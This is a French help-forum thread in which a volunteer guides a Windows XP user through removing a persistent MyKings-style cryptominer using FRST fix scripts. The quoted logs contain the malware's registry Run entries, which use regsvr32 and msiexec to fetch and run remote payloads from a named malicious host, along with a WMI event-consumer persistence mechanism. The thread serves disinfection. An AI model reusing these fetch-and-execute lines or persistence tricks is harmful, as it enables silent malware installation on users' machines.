BAT/CoinMiner.Ru Trojan

Question

Bonjour, 

Un grand merci d'avance,

je suis sur Windows XP pack3 / Firefox 52.0, mon antivirus Nod32 détecte à chaque démarrage de PC la présence d'un Trojan BAT/CoinMiner.Ru au niveau de c:\windows\debug\c2.bat créé par le fichier c:\windows\system32\wbem\scrcons.exe 

Nod32 le supprime (cleaned by deleting), mais ce fichier revient à chaque démarrage :(

Quelqu'un peut m'aider de se débarrasser de ça !!!!

Merci encore

Malekal_morte- · Answer

Salut,

Ca fait penser à des miner qui vont par la vulnérabilité MS17-010
https://forum.malekal.com/viewtopic.php?t=57653 
 
Pour voir :


Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :

 FRST.txt
 Shortcut.txt
 Additionnal.txt

Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

webdoweb · Answer

Merci pour votre réponse,

voila les rapports de FRST:

https://pjjoint.malekal.com/files.php?id=FRST_20170828_r8j8w7u11y5
https://pjjoint.malekal.com/files.php?id=20170828_m11m10s5m13p15
https://pjjoint.malekal.com/files.php?id=20170828_b9s12o14j9s10

Malekal_morte- · Answer

bingo, c'est bien un miner qui va par la vulnérabilité mentionnée, on retrouve le même type d'adresse : js.mykings.top Le bon côté, c'est que les .Bat désactive SMB et parfois ajoute des règles sur le Fw de Windows pour te protéger =) Toutefois, il faudrait installer ces mises à jour manuellement pour être sûr que la machine soit safe. Je te donne la correction FRST, NOD32 devrait dégager les trucs qui ont été mis dans debug et wbem. C'est souvent bien détecté. Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran. Ouvre le bloc-notes : Touche Windows + R, Dans le champs "Exécuter", saisir notepad et OK. Copie/Colle dedans ce qui suit : CreateRestorePoint:HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ] HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ] Hosts:EmptyTemp:RemoveProxy:Reboot: Une fois, le texte collé dans le Bloc-notes, Menu "Fichier" puis "Enregistrer sous", A gauche, place toi sur le Bureau, Dans le champs en bas, nom du fichier mets : fixlist.txt Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau. Relance FRST et clique sur le bouton "Corriger / Fix" Un redémarrage sera peut-être nécessaire ( pas obligatoire ) Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message. Redémarre l'ordinateur. Veuillez appuyer sur une touche pour continuer la désinfection...

webdoweb · Answer

Voila merci: Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017 Exécuté par Ahmed (28-08-2017 18:10:31) Run:1 Exécuté depuis C:\Documents and Settings\Ahmed\Bureau Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur) Mode d'amorçage: Normal ============================================== fixlist contenu: CreateRestorePoint: HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ] HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ] Hosts: EmptyTemp: RemoveProxy: Reboot: Le Point de restauration a été créé avec succès. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\start => valeur supprimé(es) avec succès HKLM\Software\Microsoft\Windows\CurrentVersion\Run\start1 => valeur supprimé(es) avec succès C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès Hosts restauré(es) avec succès. ========= RemoveProxy: ========= HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings => valeur supprimé(es) avec succès HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings => valeur supprimé(es) avec succès HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings => valeur supprimé(es) avec succès HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings => valeur supprimé(es) avec succès ========= Fin de RemoveProxy: ========= =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 26494 B Java, Flash, Steam htmlcache => 7530 B Windows/system/dllcache/drivers => 177655280 B Edge => 0 B Chrome => 231449882 B Firefox => 385544590 B Opera => 0 B Temp, IE cache, history, cookies, recent: Documents and Settings => 0 B Default User => 49780 B All Users => 0 B systemprofile => 88801617 B LocalService => 10274610 B NetworkService => 1564130 B Ahmed => 59560319 B Administrateur => 145524 B RecycleBin => 0 B EmptyTemp: => 910.8 MB données temporaires supprimées. ================================ Le système a dû redémarrer. Fin de Fixlog 18:12:22

Malekal_morte- · Answer

Termine par un nettoyage NOD32.
Installe bien les mises à jour.

webdoweb · Answer

Merci pour votre réponse,

je vais lancer Nod32, juste pour info ce matin lors de démarrage de PC j'ai eu l'info de Nod32 BAT/CoinMiner.Ru cleaned by deleting
c'est que ce Trojan est toujours là

webdoweb · Answer

Salut,

Nod32 n'a rien trouvé en scan, et le popup (BAT/CoinMiner.Ru cleaned by deleting) s'affiche de temps en temps. comme quoi le Trojan est toujours présent :(

webdoweb · Answer

Oui j'ai installer les mise à jour de nod32

c:\windows\debug\ usermode
c:\windows\debug\ WPD
c:\windows\debug\ blastcln.txt
c:\windows\debug\ mrt.txt
c:\windows\debug\ netsetup.txt
c:\windows\debug\ password.txt

et dans wbem il y a 7 dossiers et 150 fichiers

voila

webdoweb · Answer

Que pense tu de cette ligne dans ADDITION.txt : 

WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION

webdoweb · Answer

oui y a des .exe dans wbem

webdoweb · Answer

Comme SCRCONS.exe c'est ce lui qui crée le c2.bat dans windows/debug

webdoweb · Answer

Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (05-09-2017 12:33:11) Run:3
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal

==============================================

fixlist contenu:
CreateRestorePoint:
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
C:\WINDOWS\DEBUG\c2.bat
C:\WINDOWS\system32\wbem\scrcons.exe
EmptyTemp:
RemoveProxy:
Reboot:

Le Point de restauration a été créé avec succès.
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION => non trouvé(e)
"C:\WINDOWS\DEBUG\c2.bat" => non trouvé(e).
C:\WINDOWS\system32\wbem\scrcons.exe => déplacé(es) avec succès

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès

========= Fin de RemoveProxy: =========

=========== EmptyTemp: ==========

BITS transfer queue => 9713 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 0 B
Java, Flash, Steam htmlcache => 711 B
Windows/system/dllcache/drivers => 18457 B
Edge => 0 B
Chrome => 29832187 B
Firefox => 377124345 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 0 B
All Users => 0 B
systemprofile => 66291 B
LocalService => 66708 B
NetworkService => 692 B
Ahmed => 142764 B
Administrateur => 0 B

RecycleBin => 0 B
EmptyTemp: => 388.4 MB données temporaires supprimées.

================================

Le système a dû redémarrer.

Fin de Fixlog 12:34:45

webdoweb · Answer

Oui, pour le moment je n'ai pas eu le popup (cleaned by deleting de nod32) j'espère qu'il est supprimé.

Merci bcp

webdoweb · Answer

Bonjour,

Je reviens vers vous :(

j'ai eu 2 popup nod32 (BAT/CoinMiner.RU trojan cleaned by deleting) pour :
- C:\WINDOWS\DEBUG\c2.bat  
- C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\8Y1GZ2V2\close2[1].bat

voici la note que j'ai trouvé sur nod32:

BAT/CoinMiner.RU trojan;cleaned by deleting;AUTORITE NT\SYSTEM;Event occurred on a new file created by the application: C:\WINDOWS\system32\wbem\scrcons.exe (BFDF2820DF45266AA1D0EB887E84FE770E5F7452).;BEC02C55C98612EE716BB5956F68E0DD27CF0AFC;05/09/2017 10:16:42


Merci d'avance

webdoweb · Answer

Oui, j'ai installé les mises à jour demandés.
le pare-feu a été désactivé, je viens de l'activer maintenant

webdoweb · Answer

Vous voulez que je refais FRST, et post les rapports?

webdoweb · Answer

en attendant tu peux voir ce lien ci-dessous, je vois que c'est WMI qui est le responsable de cette infection en relation avec scrcons.exe : 

https://forum.eset.com/topic/12134-wmi-infections/

webdoweb · Answer

FRST rapport : https://pjjoint.malekal.com/files.php?id=FRST_20170905_o14w15x5n8k14

Addition rapport: https://pjjoint.malekal.com/files.php?id=20170905_s5g10m7t12l7

Malekal_morte- · Answer

L'entrée WMI est revenue.
C'est un portable ? tu le branches à différents endroits ? 
 

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R, 
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit : 

CreateRestorePoint:WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTIONC:\WINDOWS\DEBUG\c2.bat C:\WINDOWS\system32\wbem\scrcons.exe EmptyTemp:RemoveProxy:Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

webdoweb · Answer

portable? tu veux dire téléphone mobile, oui j'ai un samsung que je charge par ce PC et non pas sur d'autres

et c'est à cause de téléphone?

webdoweb · Answer

Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (05-09-2017 12:33:11) Run:3
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal

==============================================

fixlist contenu:
CreateRestorePoint:
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
C:\WINDOWS\DEBUG\c2.bat
C:\WINDOWS\system32\wbem\scrcons.exe
EmptyTemp:
RemoveProxy:
Reboot:

Le Point de restauration a été créé avec succès.
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION => non trouvé(e)
"C:\WINDOWS\DEBUG\c2.bat" => non trouvé(e).
C:\WINDOWS\system32\wbem\scrcons.exe => déplacé(es) avec succès

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès

========= Fin de RemoveProxy: =========

=========== EmptyTemp: ==========

BITS transfer queue => 9713 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 0 B
Java, Flash, Steam htmlcache => 711 B
Windows/system/dllcache/drivers => 18457 B
Edge => 0 B
Chrome => 29832187 B
Firefox => 377124345 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 0 B
All Users => 0 B
systemprofile => 66291 B
LocalService => 66708 B
NetworkService => 692 B
Ahmed => 142764 B
Administrateur => 0 B

RecycleBin => 0 B
EmptyTemp: => 388.4 MB données temporaires supprimées.

================================

Le système a dû redémarrer.

Fin de Fixlog 12:34:45

webdoweb · Answer

C'est un ordinateur portable, désolé

Malekal_morte- · Answer

en fait ton infection s'attrape automatiquement, si l'ordinateur est vulnérable et si d'autres ordinateurs sont infectés sur le réseau.
(même si maintenant que tu as mis à la mise à jour et activé le pare-feu, ça ne devrait plus)

ma question est de savoir si tu branches l'ordinateur sur un réseau public comme une école, une entreprise, cybercafé etc.. où il peut y avoir des ordinateurs infectés.

Est-ce que tu te connectes à internet avec un modem ou un routeur ?

webdoweb · Answer

Bonjour,

- Je me connecte par wifi sur un retour au bureau, il y a d'autres ordis qui se connecte aussi, mais pas de réseau local, les ordis ne peuvent pas se connecter entre eux.

- Je me connecte aussi par un modem 3G ailleurs.

après l'analyse et le fixe par RFST l’existence de cette ligne : WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION 

dans le rapport signifie que le trojan et toujours présent sur mon PC.

Bref, j'ai installé kaspersky KVRT qui a détecté le WMIRun dans la mémoire et qui a pu l’éliminer (Nod32 ne le détecte pas en mémoire). Après une analyse par RFST j'ai remarqué l'absence de la ligne suspecte et depuis j'ai jamais eu le popup (cleared by deleting)

Voila, Merci

webdoweb · Answer

Oui espérons :)

Merci bcp pour ton aide

BAT/CoinMiner.Ru Trojan - Page 2

Fin de Fixlog 12:34:45

Discussions similaires

Newsletters